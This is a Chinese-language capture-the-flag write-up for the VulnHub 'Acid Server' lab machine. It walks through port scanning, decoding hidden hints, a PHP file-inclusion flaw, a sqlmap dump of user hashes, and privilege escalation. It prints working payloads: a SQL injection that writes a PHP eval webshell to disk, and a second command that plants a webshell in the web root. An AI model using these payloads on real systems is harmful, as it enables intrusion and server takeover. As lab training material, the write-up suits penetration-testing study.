VulnHub-Acid Server Writeup

目标

Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know.

信息收集

端口扫描

nmap -p 1-65535 -T4 -A -v 192.168.1.101

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT      STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: /Challenge
MAC Address: 00:0C:29:6F:66:8B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.840 days (since Sun Oct 7 03:09:34 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

页面信息

index.php源代码中:
0x643239334c6d70775a773d3d
d293LmpwZw==
wow.jpg

strings wow.jpg

1
2
3
"""%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~

"%)/379>@DKORU[^cfknswx~

1
2
3
4
5
6
7
8
9
10
11
37:61:65:65:30:66:36:64:  
35:38:38:65:64:39:39:30:
35:65:65:33:37:66:31:36:
61:37:63:36:31:30:64:34

7:a:e:e:0:f:6:d
5:8:8:e:d:9:9:0
5:e:e:3:7:f:1:6
a:7:c:6:1:0:d:4

63425

目录:/Challenge

dirbruter扫描目录

/Challenge下存在:
index.php
error.php
cake.php
hacked.php
include.php

利用文件包含漏洞

include.php下页面源码存在:
0x59 33 56 6a 4c 6e 4a 34 62 6e 41 3d
Y3VjLnJ4bnA=
cuc.rxnp

查看hack.php文件:

1
2
http://192.168.1.103:33447/Challenge/include.php
?file=php://filter/convert.base64-encode/resource=hacked.php&add=Extract+File

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';

sec_session_start();

if (!isset($_SESSION['protected_page'])){
header('Location: protected_page.php');
exit;
}
if (!isset($_SESSION['index_page'])){
header('Location: protected_page.php');
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="styles/main.css" />
<title>Try to Extract Juicy details</title>
</head>
<body>
<div class="wrapper">
<div class="container">
<?php
if(isset($_REQUEST['add']))
{
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mehak';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
die('Could not connect: ' . mysql_error());
}

$id = $_POST['id'];
$sql = "SELECT * FROM members WHERE ID = (('$id'))";
mysql_select_db('secure_login');
$retval = mysql_query( $sql, $conn );
if(! $retval )
{
die('Could not enter data: ' . mysql_error());
}
echo "You have entered ID successfully...Which is not a big deal :D\n";
mysql_close($conn);
}
?>
<p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br>
<form method="get" action="<?php $_PHP_SELF ?>">
Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20">
<input name="add" type="submit" id="add" value="Add ID">

</body>
</html>

发现sql注入漏洞,sqlmap跑一下

1
sqlmap.py -u "http://192.168.1.103:33447/Challenge/hacked.php" --data "add=1&id=1" --cookie="sec_session_id=4ua5he692ts3mo6c71oo6i6qn7" --dump -C "email,password,username" -T"members" -D "secure_login"
1
2
3
4
5
6
7
8
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+
| email | password | username |
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+
| acid@gmail.com | 53b9bd4416ec581838c4bde217e09f1206b94cdb95475cddda862894f4dbbeec5ceacc2e116a64cb56d8384404738c5fd16478e0266962eeb3b61da1918d5931 | Acid |
| saman.j.l33t@gmail.com | c124191d7a267cb2b83b2c59a30b2e388b77f13955340015462bffc0d90cfa7b402ecb8e3fc82717f22b127c98a4afa9ed4f3661d824c6c57a1490f9963d9234 | saman |
| test@example.com | 00807432eae173f652f2064bdca1b61b290b52d40e429a7d295d76a71084aa96c0233b82f1feac45529e0726559645acaed6f3ae58a286b9f075916ebf66cacc | test_user |
| vik.create@gmail.com | fb8db054a75254633052d951002065109cd96fe990bf5a5d5bd1581d3578235a69224784b29870046d21d95567cdfe292221fbabce17201b23ca0fd5ee4fa20e | Vivek |
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+

全部解密失败

尝试密码组合:
cuc.rxnp63425
63425cuc.rxnp
失败

sql注入写马

id=1’)) union select 1,2,3,4,’<?php @eval($_POST[cmd]); ?>’ into outfile ‘/tmp/123.php’–%20%20

成功写入一句话木马,include.php中包含:
http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File
POST:cmd=phpinfo();

成功显示phpinfo,找到了web路径/var/www/html/Challenge/,因为include.php需要cookie,用菜刀连接比较麻烦,所以在该目录下再写一个一句话木马.
cmd=file_put_contents(“/var/www/html/Challenge/hack.php”,”<?php @eval($_POST[a]); ?>”);&a=$_POST[a]

菜刀连接

提权

/Challenge下发现文件VXNlcnMudHh0,base64解码后为Users.txt
内容:zbp.yvnzt@qvpn

Y0dGemN5NTBlSFE9,解密后为pass.txt
内容:__341xnurZ

查找用户文件:

find / -user acid 2>/dev/null

找到一个流量包,分析找到saman密码:1337hax0r

切换用户,找到flag.txt

总结

存在的问题

1.在web漏洞利用中耗时太多,然而漏洞利用并不难
2.获取shell后不知道怎么提权,随意翻看文件且毫无头绪.

解决

基于目标进行渗透:

  • 利用web漏洞的目的是拿到shell,在此基础上以最快、最简洁、最隐蔽的方式利用漏洞获取shell
  • 渗透的本质是信息搜集,基于目标搜索目标的详细信息,端口、目录、用户文件、系统文件、安装的软件等等,越详细越有利